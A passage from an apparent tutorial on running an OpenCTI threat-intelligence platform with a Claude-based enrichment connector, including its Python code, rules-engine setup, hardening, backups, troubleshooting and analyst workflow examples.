method.</p><pre>OpenCTI platform<br>      │<br>      │ write event (STIX bundle)<br>      ▼<br>  RabbitMQ<br>  exchange: amq.topic<br>      │<br>      ├──► worker-1 (standard workers — write to ES/graph)<br>      ├──► worker-2<br>      ├──► worker-3<br>      └──► connector-ai-enrichment  ← our connector subscribes here<br>                  │<br>                  │ reads event payload:<br>                  │ {<br>                  │   "type": "create",<br>                  │   "data": { "id": "report--uuid", "type": "report", ... }<br>                  │ }<br>                  ▼<br>            calls Claude API<br>                  ▼<br>            writes enrichment back via GraphQL API</pre><p>Each message contains the full STIX object that was just created. The connector processes it and acknowledges the message — if it crashes mid-processing, RabbitMQ redelivers it.</p><p><strong>Connector type </strong><strong>INTERNAL_ENRICHMENT</strong> means:</p><ul><li>It does not import data on a schedule</li><li>It reacts to existing objects as they are created or updated</li><li>It appears in Settings → Connectors → Enrichment in the UI</li></ul><h4>9.2 Rules Engine (CE Automation)</h4><p><strong>Note:</strong> Playbooks are an Enterprise Edition feature. The Community Edition uses the built-in Rules Engine, which automatically infers and propagates relationships as data arrives.</p><p>All 20 rules are enabled. To verify or toggle: <strong>Settings → Customization → Rules</strong></p><p>To enable all rules via API (already done — included for re-initialization):</p><pre>RULES="attribution_attribution attribution_targets indicate_sighted attribution_use \<br>localization_of_targets location_location location_targets participate-to_parts \<br>observable_related observe_sighting part_part part-of_targets sighting_incident \<br>sighting_observable sighting_indicator report_ref_identity_part_of \<br>report_ref_indicator_based_on report_ref_observable_based_on \<br>report_ref_location_located_at parent_technique_use"<br>TOKEN=$(grep OPENCTI_ADMIN_TOKEN /home/andrey/openCTI/.env | cut -d= -f2)<br>for rule in $RULES; do<br>  curl -s -X POST http://localhost:8080/graphql \<br>    -H "Authorization: Bearer $TOKEN" \<br>    -H "Content-Type: application/json" \<br>    -d "{\"query\":\"mutation { ruleSetActivation(id: \\\"$rule\\\", enable: true) { id activated } }\"}" \<br>    | python3 -c "import sys,json; d=json.load(sys.stdin); print('$rule:', d['data']['ruleSetActivation']['activated'])"<br>done</pre><p><strong>What these rules do automatically once data arrives:</strong></p><p>RuleEffectattribution_attributionIf APT-X is attributed to Country-A, and APT-Y is a sub-group of APT-X → APT-Y also attributed to Country-Asighting_incidentIf an indicator is sighted, automatically raise an Incidentindicate_sightedIf indicator is sighted → infer the targeted entity from the indicator's relationshipreport_ref_indicator_based_onIf a Report references Observable X, and X has an Indicator → auto-link the Indicator to the Reportobservable_relatedIf two objects share a common Observable → infer a related-to relationshipparent_technique_useIf a sub-technique (T1059.001) is used → auto-link parent technique (T1059) as used</p><p><strong>For custom event-driven automation in CE</strong>, use a pycti script or the AI connector (section 9.1). The pycti library supports streaming the live event feed via helper.listen() — the AI connector in 9.1 uses exactly this pattern.10. Post-Deployment Hardening</p><h4>9.2 What Claude Extracts and How It Maps to STIX</h4><p>The connector sends the report’s description text to Claude with a structured prompt. Claude returns JSON. The connector then maps each field to STIX operations:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*f1BfkVeUO3Qlt9Kj6-MkFg.png"></figure><p>Claude output fieldSTIX actionsummaryCreates a Note object attached to the report (object_refs)threat_actors[]Looks up ThreatActor by name in graph → creates related-to relationship to reportmalware_families[]Looks up Malware by name → creates related-to relationship to reportattack_techniques[]Looks up AttackPattern by external_id (T1059.001) → creates uses relationship to reporttargeted_sectors[]Looks up Identity (sector) → creates targets relationshiptargeted_countries[]Looks up Location by ISO code → creates targets relationshipconfidenceSets x_opencti_score on the report (0–100)</p><p><strong>Why look up instead of creating?</strong> MITRE ATT&amp;CK and identity data is already loaded by the MITRE connector. Looking up prevents duplicates. Only AttackPattern objects are created if missing (since Claude may identify techniques not yet in the graph).</p><h4>9.3 Connector Code</h4><pre>mkdir -p /home/andrey/openCTI/connectors/ai-enrichment</pre><p><a href="https://infosecwriteups.com/connectors/ai-enrichment/connector.py"><strong>connectors/ai-enrichment/connector.py</strong></a></p><pre>import os<br>import json<br>import time<br>import anthropic<br>from pycti import OpenCTIConnectorHelper<br><br>SYSTEM_PROMPT = """You are a senior cyber threat intelligence analyst.<br>Analyze threat intelligence content and return structured JSON only.<br>No prose, no markdown fences, no explanation — raw JSON."""<br><br>REPORT_PROMPT = """Analyze this threat intelligence report. Return JSON with exactly these keys:<br>- summary: string (2-3 sentence executive brief, plain text)<br>- threat_actors: list of strings (actor names, aliases, groups mentioned)<br>- malware_families: list of strings (malware/tool names)<br>- attack_techniques: list of strings (MITRE ATT&amp;CK IDs only, e.g. ["T1059.001", "T1003"])<br>- targeted_sectors: list of strings (e.g. ["Finance", "Healthcare", "Government"])<br>- targeted_countries: list of strings (ISO 3166-1 alpha-2, e.g. ["US", "UA", "DE"])<br>- confidence: integer 0-100<br><br>Report:<br>{content}"""<br><br>INTRUSION_SET_PROMPT = """Analyze this threat actor / intrusion set profile. Return JSON with exactly these keys:<br>- summary: string (2-3 sentence executive brief)<br>- aliases: list of strings (other known names)<br>- malware_families: list of strings (malware/tools this actor uses)<br>- attack_techniques: list of strings (MITRE ATT&amp;CK IDs, e.g. ["T1059.001", "T1003"])<br>- targeted_sectors: list of strings (sectors this actor targets)<br>- targeted_countries: list of strings (ISO 3166-1 alpha-2 codes)<br>- motivation: string (one of: "espionage", "financial", "hacktivism", "destruction", "unknown")<br>- sophistication: string (one of: "minimal", "intermediate", "advanced", "expert", "unknown")<br>- confidence: integer 0-100<br><br>Profile:<br>{content}"""<br><br><br>class AIEnrichmentConnector:<br>    def __init__(self):<br>        config = {<br>            "opencti": {<br>                "url": os.environ.get("OPENCTI_URL", "http://opencti:8080"),<br>                "token": os.environ["OPENCTI_TOKEN"],<br>            },<br>            "connector": {<br>                "id": os.environ["CONNECTOR_ID"],<br>                "type": "INTERNAL_ENRICHMENT",<br>                "name": os.environ.get("CONNECTOR_NAME", "AI Enrichment (Claude)"),<br>                "scope": "Report,Intrusion-Set,Threat-Actor-Group,Malware",<br>                "log_level": os.environ.get("CONNECTOR_LOG_LEVEL", "info"),<br>                "auto": False,<br>            },<br>        }<br>        self.helper = OpenCTIConnectorHelper(config)<br>        self.client = anthropic.Anthropic(api_key=os.environ["ANTHROPIC_API_KEY"])<br>        self.model = os.environ.get("AI_MODEL", "claude-opus-4-7")<br><br>    # -------------------------------------------------------------------------<br>    # Claude call with retry on rate limit<br>    # -------------------------------------------------------------------------<br><br>    def _call_claude(self, prompt_template: str, content: str) -&gt; dict | None:<br>        for attempt in range(3):<br>            try:<br>                msg = self.client.messages.create(<br>                    model=self.model,<br>                    max_tokens=2048,<br>                    system=SYSTEM_PROMPT,<br>                    messages=[{"role": "user", "content": prompt_template.format(content=content[:8000])}],<br>                )<br>                return json.loads(msg.content[0].text)<br>            except anthropic.RateLimitError:<br>                wait = 60 * (attempt + 1)<br>                self.helper.log_warning(f"Rate limited — waiting {wait}s")<br>                time.sleep(wait)<br>            except (json.JSONDecodeError, anthropic.APIError) as e:<br>                self.helper.log_error(f"Claude call failed: {e}")<br>                return None<br>        return None<br><br>    # -------------------------------------------------------------------------<br>    # STIX write-back helpers<br>    # -------------------------------------------------------------------------<br><br>    def _add_note(self, entity_id: str, summary: str, confidence: int) -&gt; None:<br>        self.helper.api.note.create(<br>            abstract="AI Summary",<br>            content=summary,<br>            confidence=confidence,<br>            object_ids=[entity_id],<br>        )<br><br>    def _link_threat_actors(self, entity_id: str, names: list, confidence: int) -&gt; None:<br>        for name in names:<br>            actor = self.helper.api.threat_actor_group.read(<br>                filters={"mode": "and", "filters": [{"key": "name", "values": [name]}], "filterGroups": []}<br>            )<br>            if actor:<br>                self.helper.api.stix_core_relationship.create(<br>                    fromId=entity_id,<br>                    toId=actor["id"],<br>                    relationship_type="related-to",<br>                    confidence=confidence,<br>                )<br><br>    def _link_malware(self, entity_id: str, names: list, confidence: int) -&gt; None:<br>        for name in names:<br>            malware = self.helper.api.malware.read(<br>                filters={"mode": "and", "filters": [{"key": "name", "values": [name]}], "filterGroups": []}<br>            )<br>            if malware:<br>                self.helper.api.stix_core_relationship.create(<br>                    fromId=entity_id,<br>                    toId=malware["id"],<br>                    relationship_type="uses",<br>                    confidence=confidence,<br>                )<br><br>    def _link_attack_patterns(self, entity_id: str, technique_ids: list, confidence: int) -&gt; None:<br>        for tid in technique_ids:<br>            pattern = self.helper.api.attack_pattern.read(<br>                filters={"mode": "and", "filters": [{"key": "x_mitre_id", "values": [tid]}], "filterGroups": []}<br>            )<br>            if not pattern:<br>                pattern = self.helper.api.attack_pattern.create(<br>                    name=tid,<br>                    x_mitre_id=tid,<br>                    confidence=50,<br>                )<br>            if pattern:<br>                self.helper.api.stix_core_relationship.create(<br>                    fromId=entity_id,<br>                    toId=pattern["id"],<br>                    relationship_type="uses",<br>                    confidence=confidence,<br>                )<br><br>    def _update_score(self, entity_id: str, confidence: int) -&gt; None:<br>        self.helper.api.stix_domain_object.update_field(<br>            id=entity_id,<br>            input={"key": "x_opencti_score", "value": str(confidence)},<br>        )<br><br>    # -------------------------------------------------------------------------<br>    # Enrichment handlers per entity type<br>    # -------------------------------------------------------------------------<br><br>    def _enrich_report(self, report: dict) -&gt; str:<br>        content = report.get("description") or ""<br>        if len(content) &lt; 50:<br>            content = report.get("name", "")<br>        if not content or len(content) &lt; 10:<br>            return "Skipped: content too short"<br><br>        self.helper.log_info(f"Enriching report: {report['name']}")<br>        result = self._call_claude(REPORT_PROMPT, content)<br>        if not result:<br>            return "Skipped: Claude error"<br><br>        confidence = result.get("confidence", 50)<br>        entity_id = report["id"]<br><br>        if result.get("summary"):<br>            self._add_note(entity_id, result["summary"], confidence)<br>        if result.get("threat_actors"):<br>            self._link_threat_actors(entity_id, result["threat_actors"], confidence)<br>        if result.get("malware_families"):<br>            self._link_malware(entity_id, result["malware_families"], confidence)<br>        if result.get("attack_techniques"):<br>            self._link_attack_patterns(entity_id, result["attack_techniques"], confidence)<br><br>        self._update_score(entity_id, confidence)<br>        self.helper.log_info(f"Enriched report '{report['name']}'")<br>        return "Enriched"<br><br>    def _enrich_intrusion_set(self, entity: dict) -&gt; str:<br>        content = entity.get("description") or entity.get("name", "")<br>        if not content or len(content) &lt; 10:<br>            return "Skipped: content too short"<br><br>        self.helper.log_info(f"Enriching intrusion set: {entity['name']}")<br>        result = self._call_claude(INTRUSION_SET_PROMPT, content)<br>        if not result:<br>            return "Skipped: Claude error"<br><br>        confidence = result.get("confidence", 50)<br>        entity_id = entity["id"]<br><br>        if result.get("summary"):<br>            self._add_note(entity_id, result["summary"], confidence)<br>        if result.get("malware_families"):<br>            self._link_malware(entity_id, result["malware_families"], confidence)<br>        if result.get("attack_techniques"):<br>            self._link_attack_patterns(entity_id, result["attack_techniques"], confidence)<br><br>        self.helper.log_info(f"Enriched intrusion set '{entity['name']}'")<br>        return "Enriched"<br><br>    # -------------------------------------------------------------------------<br>    # Event handler<br>    # -------------------------------------------------------------------------<br><br>    def process_message(self, data: dict) -&gt; str:<br>        entity_type = data.get("entity_type", "").lower()<br>        entity_id = data.get("entity_id")<br>        enrichment_entity = data.get("enrichment_entity", {})<br><br>        self.helper.log_info(f"Received entity_type='{entity_type}' id='{entity_id}'")<br><br>        if not entity_id:<br>            return "Skipped"<br><br>        entity = enrichment_entity or {}<br><br>        if entity_type == "report":<br>            if not entity:<br>                entity = self.helper.api.report.read(id=entity_id) or {}<br>            if entity.get("confidence", 0) &lt; 40:<br>                return "Skipped: low confidence"<br>            return self._enrich_report(entity)<br><br>        if entity_type in ("intrusion-set", "threat-actor-group"):<br>            if not entity:<br>                entity = self.helper.api.intrusion_set.read(id=entity_id) or {}<br>            if not entity:<br>                return "Not found"<br>            return self._enrich_intrusion_set(entity)<br><br>        if entity_type == "malware":<br>            if not entity:<br>                entity = self.helper.api.malware.read(id=entity_id) or {}<br>            if not entity:<br>                return "Not found"<br>            content = entity.get("description") or entity.get("name", "")<br>            if not content or len(content) &lt; 10:<br>                return "Skipped: content too short"<br>            self.helper.log_info(f"Enriching malware: {entity['name']}")<br>            result = self._call_claude(REPORT_PROMPT, content)<br>            if not result:<br>                return "Skipped: Claude error"<br>            confidence = result.get("confidence", 50)<br>            if result.get("summary"):<br>                self._add_note(entity["id"], result["summary"], confidence)<br>            if result.get("attack_techniques"):<br>                self._link_attack_patterns(entity["id"], result["attack_techniques"], confidence)<br>            self._update_score(entity["id"], confidence)<br>            return "Enriched"<br><br>        return "Skipped"<br><br>    def start(self):<br>        self.helper.log_info("AI Enrichment connector starting...")<br>        self.helper.listen(self.process_message)<br><br><br>if __name__ == "__main__":<br>    AIEnrichmentConnector().start()</pre><p><a href="https://infosecwriteups.com/connectors/ai-enrichment/Dockerfile"><strong>connectors/ai-enrichment/Dockerfile</strong></a></p><pre>FROM python:3.11-slim<br>WORKDIR /app<br>COPY requirements.txt .<br>RUN pip install --no-cache-dir -r requirements.txt<br>COPY connector.py .<br>CMD ["python", "connector.py"]</pre><p><a href="https://infosecwriteups.com/connectors/ai-enrichment/requirements.txt"><strong>connectors/ai-enrichment/requirements.txt</strong></a></p><pre>pycti&gt;=6.2.0<br>anthropic&gt;=0.40.0</pre><h4>9.4 Deploy the AI Connector</h4><p><strong>Prerequisites:</strong> Set ANTHROPIC_API_KEY in .env first.</p><pre>cd /home/andrey/openCTI<br># Build the image<br>docker compose -f docker-compose.ai.yml build<br># Start it<br>docker compose -f docker-compose.ai.yml up -d<br># Verify it registered with OpenCTI (look for "AI Enrichment" in connector list)<br>docker logs opencti-connector-ai-enrichment-1 --tail=20</pre><p>In the OpenCTI UI: <strong>Settings → Connectors → Enrichment</strong> — the connector should appear with status connected after ~10 seconds.</p><h4>9.5 Testing the Pipeline</h4><p>Trigger a manual enrichment by importing a real threat report:</p><pre># Import a STIX report via the API to trigger the connector<br>curl -s -X POST http://localhost:8080/graphql \<br>  -H "Authorization: Bearer $(grep OPENCTI_ADMIN_TOKEN .env | cut -d= -f2)" \<br>  -H "Content-Type: application/json" \<br>  -d '{<br>    "query": "mutation { reportAdd(input: { name: \"Test: APT29 spearphishing campaign\", description: \"APT29, also known as Cozy Bear, conducted a spearphishing campaign targeting NATO members using a malicious PDF dropper that installed Cobalt Strike beacon via PowerShell (T1059.001). The campaign targeted defense contractors in Poland and Germany. The malware communicated with C2 over HTTPS using domain fronting (T1090.004).\", published: \"2024-01-15T00:00:00Z\", report_types: [\"threat-report\"] }) { id name } }"<br>  }'</pre><p>Then check what the AI connector wrote back:</p><pre># Watch connector logs for the enrichment<br>docker logs -f opencti-connector-ai-enrichment-1 2&gt;&amp;1 | grep -E "Enriching|Enriched|Error"<br># Expected output:<br># Enriching report: Test: APT29 spearphishing campaign<br># Enriched: 1 actors, 1 malware, 2 techniques</pre><p>In the UI, open the report — it should now have a Note with the summary, relationships to APT29 and Cobalt Strike, and links to T1059.001 and T1090.004.</p><h4>9.6 Cost and Rate Limiting</h4><p><strong>Estimated Claude API cost per report:</strong></p><ul><li>~500–2000 tokens input (report text, truncated at 8000 chars)</li><li>~300 tokens output (JSON response)</li><li>At claude-opus-4-7 pricing: ~$0.01–0.05 per report</li></ul><p><strong>Rate limiting:</strong> The Anthropic API has per-minute token limits. If AlienVault imports hundreds of reports in a burst, the connector will hit rate limits. Add a simple backoff:</p><pre>import time<br>def _call_claude(self, content: str) -&gt; dict | None:<br>    for attempt in range(3):<br>        try:<br>            msg = self.client.messages.create(...)<br>            return json.loads(msg.content[0].text)<br>        except anthropic.RateLimitError:<br>            time.sleep(60 * (attempt + 1))<br>        except (json.JSONDecodeError, anthropic.APIError) as e:<br>            self.helper.log_error(f"Claude call failed: {e}")<br>            return None<br>    return None</pre><p><strong>To limit scope</strong> (only enrich reports above a confidence threshold, skip low-quality feeds):</p><pre>def process_message(self, data: dict) -&gt; str:<br>    report = self.helper.api.report.read(id=entity_id)<br>    # Skip reports with low confidence (e.g. AlienVault auto-generated)<br>    if report.get("confidence", 0) &lt; 40:<br>        return "Skipped: low confidence"<br>    return self._enrich_report(report)</pre><h4>9.7 Rules Engine (CE Automation)</h4><p><strong>Note:</strong> Playbooks are an Enterprise Edition feature. The Community Edition uses the built-in Rules Engine, which automatically infers and propagates relationships as data arrives.</p><p>All 20 rules are enabled. To verify or toggle: <strong>Settings → Customization → Rules</strong></p><p>To enable all rules via API (already done — included for re-initialization):</p><pre>RULES="attribution_attribution attribution_targets indicate_sighted attribution_use \<br>localization_of_targets location_location location_targets participate-to_parts \<br>observable_related observe_sighting part_part part-of_targets sighting_incident \<br>sighting_observable sighting_indicator report_ref_identity_part_of \<br>report_ref_indicator_based_on report_ref_observable_based_on \<br>report_ref_location_located_at parent_technique_use"<br>TOKEN=$(grep OPENCTI_ADMIN_TOKEN /home/andrey/openCTI/.env | cut -d= -f2)<br>for rule in $RULES; do<br>  curl -s -X POST http://localhost:8080/graphql \<br>    -H "Authorization: Bearer $TOKEN" \<br>    -H "Content-Type: application/json" \<br>    -d "{\"query\":\"mutation { ruleSetActivation(id: \\\"$rule\\\", enable: true) { id activated } }\"}" \<br>    | python3 -c "import sys,json; d=json.load(sys.stdin); print('$rule:', d['data']['ruleSetActivation']['activated'])"<br>done</pre><p><strong>What these rules do automatically once data arrives:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*epLGa3gwJILd0FyMKdsQQg.png"></figure><p>RuleEffectattribution_attributionIf APT-X is attributed to Country-A, and APT-Y is a sub-group of APT-X → APT-Y also attributed to Country-Asighting_incidentIf an indicator is sighted, automatically raise an Incidentindicate_sightedIf indicator is sighted → infer the targeted entity from the indicator's relationshipreport_ref_indicator_based_onIf a Report references Observable X, and X has an Indicator → auto-link the Indicator to the Reportobservable_relatedIf two objects share a common Observable → infer a related-to relationshipparent_technique_useIf a sub-technique (T1059.001) is used → auto-link parent technique (T1059) as used</p><p><strong>For custom event-driven automation in CE</strong>, use a pycti script or the AI connector (section 9.1). The pycti library supports streaming the live event feed via helper.listen() — the AI connector in 9.1 uses exactly this pattern.</p><h3>10. Post-Deployment Hardening</h3><h4>10.1 Reverse Proxy with TLS (nginx)</h4><pre># /etc/nginx/sites-available/opencti<br>server {<br>    listen 443 ssl http2;<br>    server_name opencti.yourdomain.com;<br>ssl_certificate     /etc/letsencrypt/live/opencti.yourdomain.com/fullchain.pem;<br>    ssl_certificate_key /etc/letsencrypt/live/opencti.yourdomain.com/privkey.pem;<br>    ssl_protocols       TLSv1.2 TLSv1.3;<br>    ssl_ciphers         ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384;<br>    location / {<br>        proxy_pass         http://127.0.0.1:8080;<br>        proxy_set_header   Host $host;<br>        proxy_set_header   X-Real-IP $remote_addr;<br>        proxy_set_header   X-Forwarded-For $proxy_add_x_forwarded_for;<br>        proxy_set_header   X-Forwarded-Proto $scheme;<br>        proxy_read_timeout 300s;<br>        client_max_body_size 100m;<br>    }<br>}<br>server {<br>    listen 80;<br>    server_name opencti.yourdomain.com;<br>    return 301 https://$host$request_uri;<br>}</pre><h4>10.2 Backup Strategy</h4><pre>#!/bin/bash<br># /home/andrey/openCTI/scripts/backup.sh<br>set -euo pipefail<br>BACKUP_DIR="/mnt/backup/opencti/$(date +%Y%m%d_%H%M%S)"<br>mkdir -p "$BACKUP_DIR"<br># Snapshot ElasticSearch<br>curl -s -u elastic:${ELASTIC_PASSWORD} \<br>  -X PUT "http://localhost:9200/_snapshot/backup/snapshot_$(date +%Y%m%d)" \<br>  -H 'Content-Type: application/json' \<br>  -d '{"indices": "*", "ignore_unavailable": true}'<br># Dump MinIO (reports, files)<br>docker run --rm \<br>  --network opencti_network \<br>  -v "$BACKUP_DIR:/backup" \<br>  minio/mc:latest \<br>  mirror myminio/opencti /backup/minio/<br>echo "Backup completed: $BACKUP_DIR"</pre><h4>10.3 Security Checklist</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*hjQWso4p7MIiBfcRr15oZw.png"></figure><ul><li>Change all default passwords in .env</li><li>Generate unique UUID4 tokens for every connector</li><li>Enable TLS via nginx reverse proxy</li><li>Restrict port 8080 to localhost only (127.0.0.1:8080:8080)</li><li>Enable ElasticSearch authentication (already configured above)</li><li>Set up fail2ban on the nginx access log</li><li>Rotate OPENCTI_ADMIN_TOKEN every 90 days</li><li>Review TLP markings — ensure nothing RED leaks via TAXII</li><li>Enable audit logging: APP__APP_LOGS__LOGS_LEVEL: info</li></ul><h3>11. Operational Runbook</h3><h4>Day 1 — Initial Data Load</h4><pre># MITRE ATT&amp;CK loads first (foundational framework)<br># Wait ~10 minutes for it to complete, then verify:<br>TOKEN=$(grep OPENCTI_ADMIN_TOKEN /home/andrey/openCTI/.env | cut -d= -f2)<br><br>curl -s -X POST http://localhost:8080/graphql \<br>  -H "Authorization: Bearer $TOKEN" \<br>  -H "Content-Type: application/json" \<br>  -d '{"query": "{ attackPatterns { edges { node { name } } } }"}' | \<br>  python3 -c "import sys,json; d=json.load(sys.stdin); print('Techniques loaded:', len(d['data']['attackPatterns']['edges']))"<br># Should return 500+ techniques</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*V2XGUwLrUpe1XNLUono5Ng.png"></figure><h4>Common Operations</h4><pre># Check all connector health<br>docker compose -f docker-compose.connectors.yml ps<br># View connector logs<br>docker compose -f docker-compose.connectors.yml logs --tail=50 connector-alienvault<br># Restart a stuck connector<br>docker compose -f docker-compose.connectors.yml restart connector-malwarebazaar<br># Scale workers for high ingest load<br>docker compose -f docker-compose.yml up -d --scale worker=5<br># Check ElasticSearch cluster health<br>curl -s -u elastic:${ELASTIC_PASSWORD} http://localhost:9200/_cluster/health?pretty<br># Check RabbitMQ queue depth (should stay near 0 at rest)<br>docker exec $(docker ps -qf name=rabbitmq) rabbitmqctl list_queues name messages</pre><h4>Monitoring Metrics to Watch</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dn9gJsZa98wedqD6PdcrQA.png"></figure><h4>Quick Reference</h4><pre># Start everything<br>cd /home/andrey/openCTI<br>docker network create opencti_network 2&gt;/dev/null || true<br>docker compose -f docker-compose.yml up -d<br>docker compose -f docker-compose.connectors.yml up -d<br>docker compose -f docker-compose.ai.yml up -d<br># Stop everything<br>docker compose -f docker-compose.ai.yml down<br>docker compose -f docker-compose.connectors.yml down<br>docker compose -f docker-compose.yml down<br># Access<br># UI:      http://localhost:8080<br># API:     http://localhost:8080/graphql<br># MinIO:   http://localhost:9001<br># RabbitMQ: http://localhost:15672</pre><h3>12. Troubleshooting</h3><h3>Known Issues — OpenCTI 6.2.0 + ElasticSearch 8.13</h3><h4>ILM Race Condition (resource_already_exists_exception)</h4><p>ES 8.13’s ILM daemon auto-bootstraps rollover indices the moment an index template with lifecycle.rollover_alias is created. OpenCTI's elCreateIndex does a check-then-create which loses the race. This kills initialization and loops with restart: always.</p><p><strong>Fix already applied:</strong> patches/back.js is mounted over the compiled bundle and makes elCreateIndex idempotent — it catches resource_already_exists_exception and returns null.</p><p><strong>Re-initialization procedure</strong> (if ES volume is dropped):</p><pre># 1. Delete any leftover index templates from a failed run<br>curl -s -u elastic:${ELASTIC_PASSWORD} -X DELETE \<br>  "http://localhost:9200/_index_template/opencti*"</pre><pre># 2. Flush Redis state<br>docker exec opencti-redis-1 redis-cli -a opencti FLUSHALL</pre><pre># 3. Start ES first, wait for green/yellow<br>docker compose up -d elasticsearch<br>until curl -s -u elastic:${ELASTIC_PASSWORD} \<br>  <a href="http://localhost:9200/_cluster/health">http://localhost:9200/_cluster/health</a> | grep -q '"status":"green"\|"status":"yellow"'; do<br>  sleep 5; done</pre><pre># 4. Start the rest — OpenCTI will create 13 indices and load base STIX data (~5-10 min)<br>docker compose up -d</pre><h4>ElasticSearch Disk Watermark (cluster RED, no shard allocation)</h4><p>ES 8.x refuses all shard allocation when disk exceeds 90% high watermark. cluster.routing.allocation.disk.threshold_enabled=false is set in docker-compose.yml.</p><p>To reclaim disk space:</p><pre>docker system prune -a   # frees ~47 GB of unused images/containers</pre><h4>Connectors Can’t Reach opencti Hostname</h4><p>Both compose files must share the same Docker network. docker-compose.yml defines:</p><pre>networks:<br>  default:<br>    name: opencti_network<br>    external: true</pre><p>If the main stack was started without this, run:</p><pre>docker network connect --alias opencti opencti_network opencti-opencti-1</pre><p>Then add the networks: block to docker-compose.yml and run docker compose up -d to make it permanent.</p><h4>OPENCTI_TOKEN vs CONNECTOR_ID</h4><p>Connectors authenticate to OpenCTI using OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}. The per-connector UUID variables (CONNECTOR_MITRE_TOKEN, etc.) are only used as CONNECTOR_ID — they identify the connector instance in the UI, not for authentication.</p><h4>CVE Connector — Zero Vulnerabilities Imported (NVD API Key Bug)</h4><p>connector-cve:6.2.0 has a bug: it sends the NVD API key as Bearer: &lt;key&gt; in the HTTP header, but NVD 2.0 API requires apiKey: &lt;key&gt;. The connector silently gets a non-200 response and imports nothing. Additionally, CVE_MAX_DATE_RANGE is required but missing from the image's default config — omitting it causes a TypeError: '&gt;' not supported between instances of 'NoneType' and 'int' crash every 60 seconds.</p><p><strong>Fix:</strong> Mount a patched api.py that uses the correct header, and add the missing vars:</p><pre>connector-cve:<br>  image: opencti/connector-cve:6.2.0<br>  volumes:<br>    - ./patches/cve/api.py:/opt/opencti-connector-cve/services/client/api.py:ro<br>  environment:<br>    CVE_MAX_DATE_RANGE: 120<br>    CVE_MAINTAIN_DATA: "true"<br>    # ... other vars</pre><p>patches/cve/api.py — change header from "Bearer": api_key to "apiKey": api_key:</p><pre>headers = {"User-Agent": header}<br>if api_key:<br>    headers["apiKey"] = api_key</pre><h3>13. Usage Examples</h3><h4>13.1 Standard OpenCTI Workflows</h4><h4>Example 1 — Investigate an IP address</h4><p>You received an alert from your SIEM about suspicious outbound traffic to 103.113.70.102.</p><p><strong>In OpenCTI UI:</strong></p><pre>Search → type 103.113.70.102</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*2k7QE2Urnr8tw_xJ2MyAPA.png"></figure><p>If AlienVault or URLhaus has seen it, you’ll find:</p><ul><li>Which threat actor uses this IP as C2</li><li>What malware family communicates with it</li><li>When it was first/last observed</li><li>TLP marking and confidence score</li><li>All reports that mention it</li></ul><p><strong>Via API:</strong></p><pre>TOKEN=$(grep OPENCTI_ADMIN_TOKEN /home/andrey/openCTI/.env | cut -d= -f2)<br>curl -s -X POST http://localhost:8080/graphql \<br>  -H "Authorization: Bearer $TOKEN" \<br>  -H "Content-Type: application/json" \<br>  -d '{"query": "{ stixCyberObservables(filters: {mode: and, filters: [{key: \"value\", values: [\"https://103.113.70.102/bin/support.client.exe\"]}], filterGroups: []}) { edges { node { id entity_type ... on Url { value } } } } }"}' | python3 -m json.tool</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fe53xHSxwntH5knkGjSO6g.png"></figure><h4>Example 2 — Build an APT profile</h4><p>You want to understand everything known about Lazarus Group before a threat briefing.</p><pre><br>Threats → Intrusion Sets → search "Lazarus"</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*S-QNk2tNF4lgs9q6-YaTUQ.png"></figure><p>The profile shows:</p><ul><li><strong>Attributed to:</strong> North Korea</li><li><strong>Motivations:</strong> Financial gain, Espionage</li><li><strong>Targets:</strong> Finance, Cryptocurrency, Defense</li><li><strong>Malware used:</strong> WannaCry, Hermes, BLINDINGCAN (all auto-linked by MITRE connector)</li><li><strong>Techniques:</strong> 80+ ATT&amp;CK techniques with usage relationships</li><li><strong>Campaigns:</strong> Operation AppleJeus, Dream Job, etc.</li><li><strong>Timeline:</strong> chronological view of all activity</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Gmvuu4OUs0uIgRZDt9p3fA.png"></figure><p>Click <strong>“ATT&amp;CK Patterns”</strong> tab → heatmap showing which techniques Lazarus uses most.</p><h4>Example 3 — Import a threat report (PDF / blog post)</h4><p>You found a Mandiant or CrowdStrike blog post about a new campaign.</p><pre>Data → Import → drag and drop the PDF or paste the URL<br>Select format: "Auto detect" or "Report"</pre><p>OpenCTI parses it and creates a Report object. The AI enrichment connector then picks it up automatically and extracts:</p><ul><li>Threat actors mentioned</li><li>Malware families</li><li>ATT&amp;CK technique IDs</li><li>Targeted sectors and countries</li></ul><p>All as STIX relationships, visible immediately in the UI.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zPViHJ6GKjMeHMtM8240gg.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*YQBdTFlcQ_q9NcblRik5pw.png"></figure><h4>Example 4 — Track a CVE across your environment</h4><p>CVE-2024–21762 (Fortinet FortiOS RCE) was just published. Check what you know about it.</p><pre>Arsenal → Vulnerabilities → search "CVE-2024-21762"</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*G9LM5wxYywcTYVdLC331jw.png"></figure><p>After the CVE connector syncs, you’ll see:</p><ul><li>CVSS score and vector</li><li>Affected software versions</li><li>Which threat actors exploit it (once AlienVault/MITRE data arrives)</li><li>Which campaigns used it</li><li>Related indicators (IPs, domains used in exploitation)</li></ul><h4>Example 5 — Create an incident from a sighting</h4><p>Your EDR detected Cobalt Strike beacon on a workstation.</p><pre>Activities → Incidents → Create<br>  Name: "CS beacon on WS-042"<br>  Type: "Intrusion"<br>  Confidence: 90<br>  Add object: link to Cobalt Strike (malware)<br>  Add object: link to T1071.001 (C2 over HTTP)<br>  Add observable: add the C2 IP</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Zm8Mi5l-QnFsTb0jAia32A.png"></figure><p>With sighting_incident rule enabled, future detections of the same C2 IP automatically raise new incidents without manual work.</p><h4>Example 6 — Export IOCs to your firewall / SIEM</h4><p>You want a live blocklist of all HIGH confidence IPv4 